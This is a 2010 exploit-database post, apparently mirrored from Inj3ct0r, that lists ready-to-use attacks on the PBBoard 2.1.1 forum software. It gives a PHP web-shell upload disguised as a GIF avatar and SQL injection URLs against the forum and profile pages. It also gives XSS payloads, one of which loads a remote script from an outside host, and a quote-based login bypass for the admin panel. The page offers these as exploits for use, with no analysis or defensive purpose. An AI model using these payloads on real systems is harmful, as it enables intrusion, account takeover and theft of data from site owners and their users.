Home / os / win7

[webapps / 0day] - PBBoard 2.1.1 Multiple Remote Vulnerabili

Posted on 27 September 2010

<!DOCTYPE html PUBLIC '-//W3C//DTD XHTML 1.0 Strict//EN' 'http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd'><html xmlns='http://www.w3.org/1999/xhtml'><head><meta http-equiv='Content-Type' content='text/html; charset=utf-8' /><meta http-equiv='Content-Language' content='en' /><title>PBBoard 2.1.1 Multiple Remote Vulnerabilities | Inj3ct0r - exploit database : vulnerability : 0day : shellcode</title><meta name='description' content='Date: 27 Sep 2010 | Exploit category: webapps / 0day | Exploit author: JiKo | Inj3ct0r - exploit database : vulnerability : 0day : shellcode' /><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon' /><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss' /><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></head><body><pre>============================================= PBBoard 2.1.1 Multiple Remote Vulnerabilities ============================================= |=-----------------------------------------------------=| |=-------------=[ JIKO |No-exploit.Com| ]=-----------=| |=-----------------------------------------------------=| [~]-----------|00| NAme :JIKO (JAWAD) Home :No-exploit.Com Mail : !x! [~]-----------|01| -{Script} name :PBBoard_v2.1.1 link :http://www.pbboard.com/PBBoard_v2.1.1.zip [~]-----------|02| -{3xpl01t} upload Shell and file .exe ....etc :( http://localhost/ara/index.php?page=usercp&amp;control=1&amp;avatar=1&amp;main=1 select From my Pc and upload your Shell php with GIF89a; you can see the size of img is long use a programme for inser php code in img sql &amp; xss all script is infected :( inser &#039;( in all % variable in the script SQl :/index.php?page=forum&amp;show=1&amp;id=2&#039;a Xss :/index.php?page=forum&amp;show=1&amp;id=2&#039;a&lt;br&gt;hello &lt;script&gt;alert(123)&lt;/script&gt; SQl :/index.php?page=profile&amp;show=1&amp;username=jawad&#039; SQl :/index.php?page=profile&amp;show=1&amp;username=jawad&#039; and id=&#039;1 Xss :/index.php?page=profile&amp;show=1&amp;username=jawad&#039;a&lt;br&gt;hello &lt;script&gt;alert(123)&lt;/script&gt; ........etc Xss In Profil Url :/index.php?page=usercp&amp;control=1&amp;avatar=1&amp;main=1 Select img From Url http://&quot;&gt;&lt;SCRIPT/XSS SRC=&quot;http://no-exploit/xss.js&quot;&gt;&lt;/SCRIPT&gt;.gif Login :( User : real name of admin or member you want | jawad&#039; or &#039;1=1-- Pass : jiko for admin panel Url : /admin.php User : jawad&#039; or &#039;1=1-- Pass : jiko :((..Etc exploit [~]-----------|03| -{Greetz} All my friends |No-Exploit.com Members ------------------------------------- # <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-09-27]</pre></body></html>

 

TOP